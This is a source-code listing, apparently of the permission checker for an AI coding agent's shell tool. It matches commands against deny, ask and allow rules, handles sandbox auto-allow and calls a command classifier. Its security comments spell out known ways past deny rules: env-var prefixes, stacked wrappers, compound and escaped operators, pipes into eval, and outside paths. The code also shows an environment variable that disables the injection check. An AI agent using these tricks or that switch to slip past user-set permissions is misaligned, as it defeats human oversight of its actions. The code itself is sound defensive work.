- * =, +, @, ~, , are harmless in unquoted env var assignment position and must
608
- * be matched to prevent trivial bypass via e.g. `FOO=a=b denied_command`.
609
- *
610
- * @param blocklist - optional regex tested against each var name; matching vars
611
- * are NOT stripped (and stripping stops there). Omit for deny rules; pass
612
- * BINARY_HIJACK_VARS for excludedCommands.
613
- */
614
- export function stripAllLeadingEnvVars(command, blocklist) {
615
- // Broader value pattern for deny-rule stripping. Handles:
616
- //
617
- // - Standard assignment (FOO=bar), append (FOO+=bar), array (FOO[0]=bar)
618
- // - Single-quoted values: '[^'\n\r]*' — bash suppresses all expansion
619
- // - Double-quoted values with backslash escapes: "(?:\\.|[^"$`\\\n\r])*"
620
- // In bash double quotes, only \$, \`, \", \\, and \newline are special.
621
- // Other \x sequences are harmless, so we allow \. inside double quotes.
622
- // We still exclude raw $ and ` (without backslash) to block expansion.
623
- // - Unquoted values: excludes shell metacharacters, allows backslash escapes
624
- // - Concatenated segments: FOO='x'y"z" — bash concatenates adjacent segments
625
- //
626
- // SECURITY: Trailing whitespace MUST be [ \t]+ (horizontal only), NOT \s+.
627
- //
628
- // The outer * matches one atomic unit per iteration: a complete quoted
629
- // string, a backslash-escape pair, or a single unquoted safe character.
630
- // The inner double-quote alternation (?:...|...)* is bounded by the
631
- // closing ", so it cannot interact with the outer * for backtracking.
632
- //
633
- // Note: $ is excluded from unquoted/double-quoted value classes to block
634
- // dangerous forms like $(cmd), ${var}, and $((expr)). This means
635
- // FOO=$VAR is not stripped — adding $VAR matching creates ReDoS risk
636
- // (CodeQL #671) and $VAR bypasses are low-priority.
637
- const ENV_VAR_PATTERN = /^([A-Za-z_][A-Za-z0-9_]*(?:\[[^\]]*\])?)\+?=(?:'[^'\n\r]*'|"(?:\\.|[^"$`\\\n\r])*"|\\.|[^ \t\n\r$`;|&()<>\\\\'"])*[ \t]+/;
638
- let stripped = command;
639
- let previousStripped = '';
640
- while (stripped !== previousStripped) {
641
- previousStripped = stripped;
642
- stripped = stripCommentLines(stripped);
643
- const m = stripped.match(ENV_VAR_PATTERN);
644
- if (!m)
645
- continue;
646
- if (blocklist?.test(m[1]))
647
- break;
648
- stripped = stripped.slice(m[0].length);
649
- }
650
- return stripped.trim();
651
- }
652
- function filterRulesByContentsMatchingInput(input, rules, matchMode, { stripAllEnvVars = false, skipCompoundCheck = false, } = {}) {
653
- const command = input.command.trim();
654
- // Strip output redirections for permission matching
655
- // This allows rules like Bash(python:*) to match "python script.py > output.txt"
656
- // Security validation of redirection targets happens separately in checkPathConstraints
657
- const commandWithoutRedirections = extractOutputRedirections(command).commandWithoutRedirections;
658
- // For exact matching, try both the original command (to preserve quotes)
659
- // and the command without redirections (to allow rules without redirections to match)
660
- // For prefix matching, only use the command without redirections
661
- const commandsForMatching = matchMode === 'exact'
662
- ? [command, commandWithoutRedirections]
663
- : [commandWithoutRedirections];
664
- // Strip safe wrapper commands (timeout, time, nice, nohup) and env vars for matching
665
- // This allows rules like Bash(npm install:*) to match "timeout 10 npm install foo"
666
- // or "GOOS=linux go build"
667
- const commandsToTry = commandsForMatching.flatMap(cmd => {
668
- const strippedCommand = stripSafeWrappers(cmd);
669
- return strippedCommand !== cmd ? [cmd, strippedCommand] : [cmd];
670
- });
671
- // SECURITY: For deny/ask rules, also try matching after stripping ALL leading
672
- // env var prefixes. This prevents bypass via `FOO=bar denied_command` where
673
- // FOO is not in the safe-list. The safe-list restriction in stripSafeWrappers
674
- // is intentional for allow rules (see HackerOne #3543050), but deny rules
675
- // must be harder to circumvent — a denied command should stay denied
676
- // regardless of env var prefixes.
677
- //
678
- // We iteratively apply both stripping operations to all candidates until no
679
- // new candidates are produced (fixed-point). This handles interleaved patterns
680
- // like `nohup FOO=bar timeout 5 claude` where:
681
- // 1. stripSafeWrappers strips `nohup` → `FOO=bar timeout 5 claude`
682
- // 2. stripAllLeadingEnvVars strips `FOO=bar` → `timeout 5 claude`
683
- // 3. stripSafeWrappers strips `timeout 5` → `claude` (deny match)
684
- //
685
- // Without iteration, single-pass compositions miss multi-layer interleaving.
686
- if (stripAllEnvVars) {
687
- const seen = new Set(commandsToTry);
688
- let startIdx = 0;
689
- // Iterate until no new candidates are produced (fixed-point)
690
- while (startIdx < commandsToTry.length) {
691
- const endIdx = commandsToTry.length;
692
- for (let i = startIdx; i < endIdx; i++) {
693
- const cmd = commandsToTry[i];
694
- if (!cmd) {
695
- continue;
696
- }
697
- // Try stripping env vars
698
- const envStripped = stripAllLeadingEnvVars(cmd);
699
- if (!seen.has(envStripped)) {
700
- commandsToTry.push(envStripped);
701
- seen.add(envStripped);
702
- }
703
- // Try stripping safe wrappers
704
- const wrapperStripped = stripSafeWrappers(cmd);
705
- if (!seen.has(wrapperStripped)) {
706
- commandsToTry.push(wrapperStripped);
707
- seen.add(wrapperStripped);
708
- }
709
- }
710
- startIdx = endIdx;
711
- }
712
- }
713
- // Precompute compound-command status for each candidate to avoid re-parsing
714
- // inside the rule filter loop (which would scale splitCommand calls with
715
- // rules.length × commandsToTry.length). The compound check only applies to
716
- // prefix/wildcard matching in 'prefix' mode, and only for allow rules.
717
- // SECURITY: deny/ask rules must match compound commands so they can't be
718
- // bypassed by wrapping a denied command in a compound expression.
719
- const isCompoundCommand = new Map();
720
- if (matchMode === 'prefix' && !skipCompoundCheck) {
721
- for (const cmd of commandsToTry) {
722
- if (!isCompoundCommand.has(cmd)) {
723
- isCompoundCommand.set(cmd, splitCommand(cmd).length > 1);
724
- }
725
- }
726
- }
727
- return Array.from(rules.entries())
728
- .filter(([ruleContent]) => {
729
- const bashRule = bashPermissionRule(ruleContent);
730
- return commandsToTry.some(cmdToMatch => {
731
- switch (bashRule.type) {
732
- case 'exact':
733
- return bashRule.command === cmdToMatch;
734
- case 'prefix':
735
- switch (matchMode) {
736
- // In 'exact' mode, only return true if the command exactly matches the prefix rule
737
- case 'exact':
738
- return bashRule.prefix === cmdToMatch;
739
- case 'prefix': {
740
- // SECURITY: Don't allow prefix rules to match compound commands.
741
- // e.g., Bash(cd:*) must NOT match "cd /path && python3 evil.py".
742
- // In the normal flow commands are split before reaching here, but
743
- // shell escaping can defeat the first splitCommand pass — e.g.,
744
- // cd src\&\& python3 hello.py → splitCommand → ["cd src&& python3 hello.py"]
745
- // which then looks like a single command that starts with "cd ".
746
- // Re-splitting the candidate here catches those cases.
747
- if (isCompoundCommand.get(cmdToMatch)) {
748
- return false;
749
- }
750
- // Ensure word boundary: prefix must be followed by space or end of string
751
- // This prevents "ls:*" from matching "lsof" or "lsattr"
752
- if (cmdToMatch === bashRule.prefix) {
753
- return true;
754
- }
755
- if (cmdToMatch.startsWith(bashRule.prefix + ' ')) {
756
- return true;
757
- }
758
- // Also match "xargs <prefix>" for bare xargs with no flags.
759
- // This allows Bash(grep:*) to match "xargs grep pattern",
760
- // and deny rules like Bash(rm:*) to block "xargs rm file".
761
- // Natural word-boundary: "xargs -n1 grep" does NOT start with
762
- // "xargs grep " so flagged xargs invocations are not matched.
763
- const xargsPrefix = 'xargs ' + bashRule.prefix;
764
- if (cmdToMatch === xargsPrefix) {
765
- return true;
766
- }
767
- return cmdToMatch.startsWith(xargsPrefix + ' ');
768
- }
769
- }
770
- break;
771
- case 'wildcard':
772
- // SECURITY FIX: In exact match mode, wildcards must NOT match because we're
773
- // checking the full unparsed command. Wildcard matching on unparsed commands
774
- // allows "foo *" to match "foo arg && curl evil.com" since .* matches operators.
775
- // Wildcards should only match after splitting into individual subcommands.
776
- if (matchMode === 'exact') {
777
- return false;
778
- }
779
- // SECURITY: Same as for prefix rules, don't allow wildcard rules to match
780
- // compound commands in prefix mode. e.g., Bash(cd *) must not match
781
- // "cd /path && python3 evil.py" even though "cd *" pattern would match it.
782
- if (isCompoundCommand.get(cmdToMatch)) {
783
- return false;
784
- }
785
- // In prefix mode (after splitting), wildcards can safely match subcommands
786
- return matchWildcardPattern(bashRule.pattern, cmdToMatch);
787
- }
788
- });
789
- })
790
- .map(([, rule]) => rule);
791
- }
792
- function matchingRulesForInput(input, toolPermissionContext, matchMode, { skipCompoundCheck = false } = {}) {
793
- const denyRuleByContents = getRuleByContentsForTool(toolPermissionContext, BashTool, 'deny');
794
- // SECURITY: Deny/ask rules use aggressive env var stripping so that
795
- // `FOO=bar denied_command` still matches a deny rule for `denied_command`.
796
- const matchingDenyRules = filterRulesByContentsMatchingInput(input, denyRuleByContents, matchMode, { stripAllEnvVars: true, skipCompoundCheck: true });
797
- const askRuleByContents = getRuleByContentsForTool(toolPermissionContext, BashTool, 'ask');
798
- const matchingAskRules = filterRulesByContentsMatchingInput(input, askRuleByContents, matchMode, { stripAllEnvVars: true, skipCompoundCheck: true });
799
- const allowRuleByContents = getRuleByContentsForTool(toolPermissionContext, BashTool, 'allow');
800
- const matchingAllowRules = filterRulesByContentsMatchingInput(input, allowRuleByContents, matchMode, { skipCompoundCheck });
801
- return {
802
- matchingDenyRules,
803
- matchingAskRules,
804
- matchingAllowRules,
805
- };
806
- }
807
- /**
808
- * Checks if the subcommand is an exact match for a permission rule
809
- */
810
- export const bashToolCheckExactMatchPermission = (input, toolPermissionContext) => {
811
- const command = input.command.trim();
812
- const { matchingDenyRules, matchingAskRules, matchingAllowRules } = matchingRulesForInput(input, toolPermissionContext, 'exact');
813
- // 1. Deny if exact command was denied
814
- if (matchingDenyRules[0] !== undefined) {
815
- return {
816
- behavior: 'deny',
817
- message: `Permission to use ${BashTool.name} with command ${command} has been denied.`,
818
- decisionReason: {
819
- type: 'rule',
820
- rule: matchingDenyRules[0],
821
- },
822
- };
823
- }
824
- // 2. Ask if exact command was in ask rules
825
- if (matchingAskRules[0] !== undefined) {
826
- return {
827
- behavior: 'ask',
828
- message: createPermissionRequestMessage(BashTool.name),
829
- decisionReason: {
830
- type: 'rule',
831
- rule: matchingAskRules[0],
832
- },
833
- };
834
- }
835
- // 3. Allow if exact command was allowed
836
- if (matchingAllowRules[0] !== undefined) {
837
- return {
838
- behavior: 'allow',
839
- updatedInput: input,
840
- decisionReason: {
841
- type: 'rule',
842
- rule: matchingAllowRules[0],
843
- },
844
- };
845
- }
846
- // 4. Otherwise, passthrough
847
- const decisionReason = {
848
- type: 'other',
849
- reason: 'This command requires approval',
850
- };
851
- return {
852
- behavior: 'passthrough',
853
- message: createPermissionRequestMessage(BashTool.name, decisionReason),
854
- decisionReason,
855
- // Suggest exact match rule to user
856
- // this may be overridden by prefix suggestions in `checkCommandAndSuggestRules()`
857
- suggestions: suggestionForExactCommand(command),
858
- };
859
- };
860
- export const bashToolCheckPermission = (input, toolPermissionContext, compoundCommandHasCd, astCommand) => {
861
- const command = input.command.trim();
862
- // 1. Check exact match first
863
- const exactMatchResult = bashToolCheckExactMatchPermission(input, toolPermissionContext);
864
- // 1a. Deny/ask if exact command has a rule
865
- if (exactMatchResult.behavior === 'deny' ||
866
- exactMatchResult.behavior === 'ask') {
867
- return exactMatchResult;
868
- }
869
- // 2. Find all matching rules (prefix or exact)
870
- // SECURITY FIX: Check Bash deny/ask rules BEFORE path constraints to prevent bypass
871
- // via absolute paths outside the project directory (HackerOne report)
872
- // When AST-parsed, the subcommand is already atomic — skip the legacy
873
- // splitCommand re-check that misparses mid-word # as compound.
874
- const { matchingDenyRules, matchingAskRules, matchingAllowRules } = matchingRulesForInput(input, toolPermissionContext, 'prefix', {
875
- skipCompoundCheck: astCommand !== undefined,
876
- });
877
- // 2a. Deny if command has a deny rule
878
- if (matchingDenyRules[0] !== undefined) {
879
- return {
880
- behavior: 'deny',
881
- message: `Permission to use ${BashTool.name} with command ${command} has been denied.`,
882
- decisionReason: {
883
- type: 'rule',
884
- rule: matchingDenyRules[0],
885
- },
886
- };
887
- }
888
- // 2b. Ask if command has an ask rule
889
- if (matchingAskRules[0] !== undefined) {
890
- return {
891
- behavior: 'ask',
892
- message: createPermissionRequestMessage(BashTool.name),
893
- decisionReason: {
894
- type: 'rule',
895
- rule: matchingAskRules[0],
896
- },
897
- };
898
- }
899
- // 3. Check path constraints
900
- // This check comes after deny/ask rules so explicit rules take precedence.
901
- // SECURITY: When AST-derived argv is available for this subcommand, pass
902
- // it through so checkPathConstraints uses it directly instead of re-parsing
903
- // with shell-quote (which has a single-quote backslash bug that causes
904
- // parseCommandArguments to return [] and silently skip path validation).
905
- const pathResult = checkPathConstraints(input, getCwd(), toolPermissionContext, compoundCommandHasCd, astCommand?.redirects, astCommand ? [astCommand] : undefined);
906
- if (pathResult.behavior !== 'passthrough') {
907
- return pathResult;
908
- }
909
- // 4. Allow if command had an exact match allow
910
- if (exactMatchResult.behavior === 'allow') {
911
- return exactMatchResult;
912
- }
913
- // 5. Allow if command has an allow rule
914
- if (matchingAllowRules[0] !== undefined) {
915
- return {
916
- behavior: 'allow',
917
- updatedInput: input,
918
- decisionReason: {
919
- type: 'rule',
920
- rule: matchingAllowRules[0],
921
- },
922
- };
923
- }
924
- // 5b. Check sed constraints (blocks dangerous sed operations before mode auto-allow)
925
- const sedConstraintResult = checkSedConstraints(input, toolPermissionContext);
926
- if (sedConstraintResult.behavior !== 'passthrough') {
927
- return sedConstraintResult;
928
- }
929
- // 6. Check for mode-specific permission handling
930
- const modeResult = checkPermissionMode(input, toolPermissionContext);
931
- if (modeResult.behavior !== 'passthrough') {
932
- return modeResult;
933
- }
934
- // 7. Check read-only rules
935
- if (BashTool.isReadOnly(input)) {
936
- return {
937
- behavior: 'allow',
938
- updatedInput: input,
939
- decisionReason: {
940
- type: 'other',
941
- reason: 'Read-only command is allowed',
942
- },
943
- };
944
- }
945
- // 8. Passthrough since no rules match, will trigger permission prompt
946
- const decisionReason = {
947
- type: 'other',
948
- reason: 'This command requires approval',
949
- };
950
- return {
951
- behavior: 'passthrough',
952
- message: createPermissionRequestMessage(BashTool.name, decisionReason),
953
- decisionReason,
954
- // Suggest exact match rule to user
955
- // this may be overridden by prefix suggestions in `checkCommandAndSuggestRules()`
956
- suggestions: suggestionForExactCommand(command),
957
- };
958
- };
959
- /**
960
- * Processes an individual subcommand and applies prefix checks & suggestions
961
- */
962
- export async function checkCommandAndSuggestRules(input, toolPermissionContext, commandPrefixResult, compoundCommandHasCd, astParseSucceeded) {
963
- // 1. Check exact match first
964
- const exactMatchResult = bashToolCheckExactMatchPermission(input, toolPermissionContext);
965
- if (exactMatchResult.behavior !== 'passthrough') {
966
- return exactMatchResult;
967
- }
968
- // 2. Check the command prefix
969
- const permissionResult = bashToolCheckPermission(input, toolPermissionContext, compoundCommandHasCd);
970
- // 2a. Deny/ask if command was explictly denied/asked
971
- if (permissionResult.behavior === 'deny' ||
972
- permissionResult.behavior === 'ask') {
973
- return permissionResult;
974
- }
975
- // 3. Ask for permission if command injection is detected. Skip when the
976
- // AST parse already succeeded — tree-sitter has verified there are no
977
- // hidden substitutions or structural tricks, so the legacy regex-based
978
- // validators (backslash-escaped operators, etc.) would only add FPs.
979
- if (!astParseSucceeded &&
980
- !isEnvTruthy(process.env.CLAUDE_CODE_DISABLE_COMMAND_INJECTION_CHECK)) {
981
- const safetyResult = await bashCommandIsSafeAsync(input.command);
982
- if (safetyResult.behavior !== 'passthrough') {
983
- const decisionReason = {
984
- type: 'other',
985
- reason: safetyResult.behavior === 'ask' && safetyResult.message
986
- ? safetyResult.message
987
- : 'This command contains patterns that could pose security risks and requires approval',
988
- };
989
- return {
990
- behavior: 'ask',
991
- message: createPermissionRequestMessage(BashTool.name, decisionReason),
992
- decisionReason,
993
- suggestions: [], // Don't suggest saving a potentially dangerous command
994
- };
995
- }
996
- }
997
- // 4. Allow if command was allowed
998
- if (permissionResult.behavior === 'allow') {
999
- return permissionResult;
1000
- }
1001
- // 5. Suggest prefix if available, otherwise exact command
1002
- const suggestedUpdates = commandPrefixResult?.commandPrefix
1003
- ? suggestionForPrefix(commandPrefixResult.commandPrefix)
1004
- : suggestionForExactCommand(input.command);
1005
- return {
1006
- ...permissionResult,
1007
- suggestions: suggestedUpdates,
1008
- };
1009
- }
1010
- /**
1011
- * Checks if a command should be auto-allowed when sandboxed.
1012
- * Returns early if there are explicit deny/ask rules that should be respected.
1013
- *
1014
- * NOTE: This function should only be called when sandboxing and auto-allow are enabled.
1015
- *
1016
- * @param input - The bash tool input
1017
- * @param toolPermissionContext - The permission context
1018
- * @returns PermissionResult with:
1019
- * - deny/ask if explicit rule exists (exact or prefix)
1020
- * - allow if no explicit rules (sandbox auto-allow applies)
1021
- * - passthrough should not occur since we're in auto-allow mode
1022
- */
1023
- function checkSandboxAutoAllow(input, toolPermissionContext) {
1024
- const command = input.command.trim();
1025
- // Check for explicit deny/ask rules on the full command (exact + prefix)
1026
- const { matchingDenyRules, matchingAskRules } = matchingRulesForInput(input, toolPermissionContext, 'prefix');
1027
- // Return immediately if there's an explicit deny rule on the full command
1028
- if (matchingDenyRules[0] !== undefined) {
1029
- return {
1030
- behavior: 'deny',
1031
- message: `Permission to use ${BashTool.name} with command ${command} has been denied.`,
1032
- decisionReason: {
1033
- type: 'rule',
1034
- rule: matchingDenyRules[0],
1035
- },
1036
- };
1037
- }
1038
- // SECURITY: For compound commands, check each subcommand against deny/ask
1039
- // rules. Prefix rules like Bash(rm:*) won't match the full compound command
1040
- // (e.g., "echo hello && rm -rf /" doesn't start with "rm"), so we must
1041
- // check each subcommand individually.
1042
- // IMPORTANT: Subcommand deny checks must run BEFORE full-command ask returns.
1043
- // Otherwise a wildcard ask rule matching the full command (e.g., Bash(*echo*))
1044
- // would return 'ask' before a prefix deny rule on a subcommand (e.g., Bash(rm:*))
1045
- // gets checked, downgrading a deny to an ask.
1046
- const subcommands = splitCommand(command);
1047
- if (subcommands.length > 1) {
1048
- let firstAskRule;
1049
- for (const sub of subcommands) {
1050
- const subResult = matchingRulesForInput({ command: sub }, toolPermissionContext, 'prefix');
1051
- // Deny takes priority — return immediately
1052
- if (subResult.matchingDenyRules[0] !== undefined) {
1053
- return {
1054
- behavior: 'deny',
1055
- message: `Permission to use ${BashTool.name} with command ${command} has been denied.`,
1056
- decisionReason: {
1057
- type: 'rule',
1058
- rule: subResult.matchingDenyRules[0],
1059
- },
1060
- };
1061
- }
1062
- // Stash first ask match; don't return yet (deny across all subs takes priority)
1063
- firstAskRule ??= subResult.matchingAskRules[0];
1064
- }
1065
- if (firstAskRule) {
1066
- return {
1067
- behavior: 'ask',
1068
- message: createPermissionRequestMessage(BashTool.name),
1069
- decisionReason: {
1070
- type: 'rule',
1071
- rule: firstAskRule,
1072
- },
1073
- };
1074
- }
1075
- }
1076
- // Full-command ask check (after all deny sources have been exhausted)
1077
- if (matchingAskRules[0] !== undefined) {
1078
- return {
1079
- behavior: 'ask',
1080
- message: createPermissionRequestMessage(BashTool.name),
1081
- decisionReason: {
1082
- type: 'rule',
1083
- rule: matchingAskRules[0],
1084
- },
1085
- };
1086
- }
1087
- // No explicit rules, so auto-allow with sandbox
1088
- return {
1089
- behavior: 'allow',
1090
- updatedInput: input,
1091
- decisionReason: {
1092
- type: 'other',
1093
- reason: 'Auto-allowed with sandbox (autoAllowBashIfSandboxed enabled)',
1094
- },
1095
- };
1096
- }
1097
- /**
1098
- * Filter out `cd ${cwd}` prefix subcommands, keeping astCommands aligned.
1099
- * Extracted to keep bashToolHasPermission under Bun's feature() DCE
1100
- * complexity threshold — inlining this breaks pendingClassifierCheck
1101
- * attachment in ~10 classifier tests.
1102
- */
1103
- function filterCdCwdSubcommands(rawSubcommands, astCommands, cwd, cwdMingw) {
1104
- const subcommands = [];
1105
- const astCommandsByIdx = [];
1106
- for (let i = 0; i < rawSubcommands.length; i++) {
1107
- const cmd = rawSubcommands[i];
1108
- if (cmd === `cd ${cwd}` || cmd === `cd ${cwdMingw}`)
1109
- continue;
1110
- subcommands.push(cmd);
1111
- astCommandsByIdx.push(astCommands?.[i]);
1112
- }
1113
- return { subcommands, astCommandsByIdx };
1114
- }
1115
- /**
1116
- * Early-exit deny enforcement for the AST too-complex and checkSemantics
1117
- * paths. Returns the exact-match result if non-passthrough (deny/ask/allow),
1118
- * then checks prefix/wildcard deny rules. Returns null if neither matched,
1119
- * meaning the caller should fall through to ask. Extracted to keep
1120
- * bashToolHasPermission under Bun's feature() DCE complexity threshold.
1121
- */
1122
- function checkEarlyExitDeny(input, toolPermissionContext) {
1123
- const exactMatchResult = bashToolCheckExactMatchPermission(input, toolPermissionContext);
1124
- if (exactMatchResult.behavior !== 'passthrough') {
1125
- return exactMatchResult;
1126
- }
1127
- const denyMatch = matchingRulesForInput(input, toolPermissionContext, 'prefix').matchingDenyRules[0];
1128
- if (denyMatch !== undefined) {
1129
- return {
1130
- behavior: 'deny',
1131
- message: `Permission to use ${BashTool.name} with command ${input.command} has been denied.`,
1132
- decisionReason: { type: 'rule', rule: denyMatch },
1133
- };
1134
- }
1135
- return null;
1136
- }
1137
- /**
1138
- * checkSemantics-path deny enforcement. Calls checkEarlyExitDeny (exact-match
1139
- * + full-command prefix deny), then checks each individual SimpleCommand .text
1140
- * span against prefix deny rules. The per-subcommand check is needed because
1141
- * filterRulesByContentsMatchingInput has a compound-command guard
1142
- * (splitCommand().length > 1 → prefix rules return false) that defeats
1143
- * `Bash(eval:*)` matching against a full pipeline like `echo foo | eval rm`.
1144
- * Each SimpleCommand span is a single command, so the guard doesn't fire.
1145
- *
1146
- * Separate helper (not folded into checkEarlyExitDeny or inlined at the call
1147
- * site) because bashToolHasPermission is tight against Bun's feature() DCE
1148
- * complexity threshold — adding even ~5 lines there breaks
1149
- * feature('BASH_CLASSIFIER') evaluation and drops pendingClassifierCheck.
1150
- */
1151
- function checkSemanticsDeny(input, toolPermissionContext, commands) {
1152
- const fullCmd = checkEarlyExitDeny(input, toolPermissionContext);
1153
- if (fullCmd !== null)
1154
- return fullCmd;
1155
- for (const cmd of commands) {
1156
- const subDeny = matchingRulesForInput({ ...input, command: cmd.text }, toolPermissionContext, 'prefix').matchingDenyRules[0];
1157
- if (subDeny !== undefined) {
1158
- return {
1159
- behavior: 'deny',
1160
- message: `Permission to use ${BashTool.name} with command ${input.command} has been denied.`,
1161
- decisionReason: { type: 'rule', rule: subDeny },
1162
- };
1163
- }
1164
- }
1165
- return null;
1166
- }
1167
- /**
1168
- * Builds the pending classifier check metadata if classifier is enabled and has allow descriptions.
1169
- * Returns undefined if classifier is disabled, in auto mode, or no allow descriptions exist.
1170
- */
1171
- function buildPendingClassifierCheck(command, toolPermissionContext) {
1172
- if (!isClassifierPermissionsEnabled()) {
1173
- return undefined;
1174
- }
1175
- // Skip in auto mode - auto mode classifier handles all permission decisions
1176
- if (feature('TRANSCRIPT_CLASSIFIER') && toolPermissionContext.mode === 'auto')
1177
- return undefined;
1178
- if (toolPermissionContext.mode === 'bypassPermissions')
1179
- return undefined;
1180
- const allowDescriptions = getBashPromptAllowDescriptions(toolPermissionContext);
1181
- if (allowDescriptions.length === 0)
1182
- return undefined;
1183
- return {
1184
- command,
1185
- cwd: getCwd(),
1186
- descriptions: allowDescriptions,
1187
- };
1188
- }
1189
- const speculativeChecks = new Map();
1190
- /**
1191
- * Start a speculative bash allow classifier check early, so it runs in
1192
- * parallel with pre-tool hooks, deny/ask classifiers, and permission dialog setup.
1193
- * The result can be consumed later by executeAsyncClassifierCheck via
1194
- * consumeSpeculativeClassifierCheck.
1195
- */
1196
- export function peekSpeculativeClassifierCheck(command) {
1197
- return speculativeChecks.get(command);
1198
- }
1199
- export function startSpeculativeClassifierCheck(command, toolPermissionContext, signal, isNonInteractiveSession) {
1200
- // Same guards as buildPendingClassifierCheck
1201
- if (!isClassifierPermissionsEnabled())
1202
- return false;
1203
- if (feature('TRANSCRIPT_CLASSIFIER') && toolPermissionContext.mode === 'auto')
1204
- return false;
1205
- if (toolPermissionContext.mode === 'bypassPermissions')
1206
- return false;
1207
- const allowDescriptions = getBashPromptAllowDescriptions(toolPermissionContext);
1208
- if (allowDescriptions.length === 0)
1209
- return false;
1210
- const cwd = getCwd();
1211
- const promise = classifyBashCommand(command, cwd, allowDescriptions, 'allow', signal, isNonInteractiveSession);
1212
- // Prevent unhandled rejection if the signal aborts before this promise is consumed.
1213
- // The original promise (which may reject) is still stored in the Map for consumers to await.
1214
- promise.catch(() => { });
1215
- speculativeChecks.set(command, promise);
1216
- return true;
1217
- }
1218
- /**
1219
- * Consume a speculative classifier check result for the given command.
1220
- * Returns the promise if one exists (and removes it from the map), or undefined.
1221
- */
1222
- export function consumeSpeculativeClassifierCheck(command) {
1223
- const promise = speculativeChecks.get(command);
1224
- if (promise) {
1225
- speculativeChecks.delete(command);
1226
- }
1227
- return promise;
1228
- }
1229
- export function clearSpeculativeChecks() {
1230
- speculativeChecks.clear();
1231
- }
1232
- /**
1233
- * Await a pending classifier check and return a PermissionDecisionReason if
1234
- * high-confidence allow, or undefined otherwise.
1235
- *
1236
- * Used by swarm agents (both tmux and in-process) to gate permission
1237
- * forwarding: run the classifier first, and only escalate to the leader
1238
- * if the classifier doesn't auto-approve.
1239
- */
1240
- export async function awaitClassifierAutoApproval(pendingCheck, signal, isNonInteractiveSession) {
1241
- const { command, cwd, descriptions } = pendingCheck;
1242
- const speculativeResult = consumeSpeculativeClassifierCheck(command);
1243
- const classifierResult = speculativeResult
1244
- ? await speculativeResult
1245
- : await classifyBashCommand(command, cwd, descriptions, 'allow', signal, isNonInteractiveSession);
1246
- logClassifierResultForAnts(command, 'allow', descriptions, classifierResult);
1247
- if (feature('BASH_CLASSIFIER') &&
1248
- classifierResult.matches &&
1249
- classifierResult.confidence === 'high') {
1250
- return {
1251
- type: 'classifier',
1252
- classifier: 'bash_allow',
1253
- reason: `Allowed by prompt rule: "${classifierResult.matchedDescription}"`,
1254
- };
1255
- }
1256
- return undefined;
1257
- }
1258
- /**
1259
- * Execute the bash allow classifier check asynchronously.
1260
- * This runs in the background while the permission prompt is shown.
1261
- * If the classifier allows with high confidence and the user hasn't interacted, auto-approves.
1262
- *
1263
- * @param pendingCheck - Classifier check metadata from bashToolHasPermission
1264
- * @param signal - Abort signal
1265
- * @param isNonInteractiveSession - Whether this is a non-interactive session
1266
- * @param callbacks - Callbacks to check if we should continue and handle approval
1267
- */
1268
- export async function executeAsyncClassifierCheck(pendingCheck, signal, isNonInteractiveSession, callbacks) {
1269
- const { command, cwd, descriptions } = pendingCheck;
1270
- const speculativeResult = consumeSpeculativeClassifierCheck(command);
1271
- let classifierResult;
1272
- try {
1273
- classifierResult = speculativeResult
1274
- ? await speculativeResult
1275
- : await classifyBashCommand(command, cwd, descriptions, 'allow', signal, isNonInteractiveSession);
1276
- }
1277
- catch (error) {
1278
- // When the coordinator session is cancelled, the abort signal fires and the
1279
- // classifier API call rejects with APIUserAbortError. This is expected and
1280
- // should not surface as an unhandled promise rejection.
1281
- if (error instanceof APIUserAbortError || error instanceof AbortError) {
1282
- callbacks.onComplete?.();
1283
- return;
1284
- }
1285
- callbacks.onComplete?.();
1286
- throw error;
1287
- }
1288
- logClassifierResultForAnts(command, 'allow', descriptions, classifierResult);
1289
- // Don't auto-approve if user already made a decision or has interacted
1290
- // with the permission dialog (e.g., arrow keys, tab, typing)
1291
- if (!callbacks.shouldContinue())
1292
- return;
1293
- if (feature('BASH_CLASSIFIER') &&
1294
- classifierResult.matches &&
1295
- classifierResult.confidence === 'high') {
1296
- callbacks.onAllow({
1297
- type: 'classifier',
1298
- classifier: 'bash_allow',
1299
- reason: `Allowed by prompt rule: "${classifierResult.matchedDescription}"`,
1300
- });
1301
- }
1302
- else {
1303
- // No match — notify so the checking indicator is cleared
1304
- callbacks.onComplete?.();
1305
- }
1306
- }
1307
- /**
1308
- * The main implementation to check if we need to ask for user permission to call BashTool with a given input
1309
- */
1310
- export async function bashToolHasPermission(input, context, getCommandSubcommandPrefixFn = getCommandSubcommandPrefix) {
1311
- let appState = context.getAppState();
1312
- // 0. AST-based security parse. This replaces both tryParseShellCommand
1313
- // (the shell-quote pre-check) and the bashCommandIsSafe misparsing gate.
1314
- // tree-sitter produces either a clean SimpleCommand[] (quotes resolved,
1315
- // no hidden substitutions) or 'too-complex' — which is exactly the signal
1316
- // we need to decide whether splitCommand's output can be trusted.
1317
- //
1318
- // When tree-sitter WASM is unavailable OR the injection check is disabled
1319
- // via env var, we fall back to the old path (legacy gate at ~1370 runs).
1320
- const injectionCheckDisabled = isEnvTruthy(process.env.CLAUDE_CODE_DISABLE_COMMAND_INJECTION_CHECK);
1321
- // GrowthBook killswitch for shadow mode — when off, skip the native parse
1322
- // entirely. Computed once; feature() must stay inline in the ternary below.
1323
- const shadowEnabled = feature('TREE_SITTER_BASH_SHADOW')
1324
- ? getFeatureValue_CACHED_MAY_BE_STALE('tengu_birch_trellis', true)
1325
- : false;
1326
- // Parse once here; the resulting AST feeds both parseForSecurityFromAst
1327
- // and bashToolCheckCommandOperatorPermissions.
1328
- let astRoot = injectionCheckDisabled
1329
- ? null
1330
- : feature('TREE_SITTER_BASH_SHADOW') && !shadowEnabled
1331
- ? null
1332
- : await parseCommandRaw(input.command);
1333
- let astResult = astRoot
1334
- ? parseForSecurityFromAst(input.command, astRoot)
1335
- : { kind: 'parse-unavailable' };
1336
- let astSubcommands = null;
1337
- let astRedirects;
1338
- let astCommands;
1339
- let shadowLegacySubs;
1340
- // Shadow-test tree-sitter: record its verdict, then force parse-unavailable
1341
- // so the legacy path stays authoritative. parseCommand stays gated on
1342
- // TREE_SITTER_BASH (not SHADOW) so legacy internals remain pure regex.
1343
- // One event per bash call captures both divergence AND unavailability
1344
- // reasons; module-load failures are separately covered by the
1345
- // session-scoped tengu_tree_sitter_load event.
1346
- if (feature('TREE_SITTER_BASH_SHADOW')) {
1347
- const available = astResult.kind !== 'parse-unavailable';
1348
- let tooComplex = false;
1349
- let semanticFail = false;
1350
- let subsDiffer = false;
1351
- if (available) {
1352
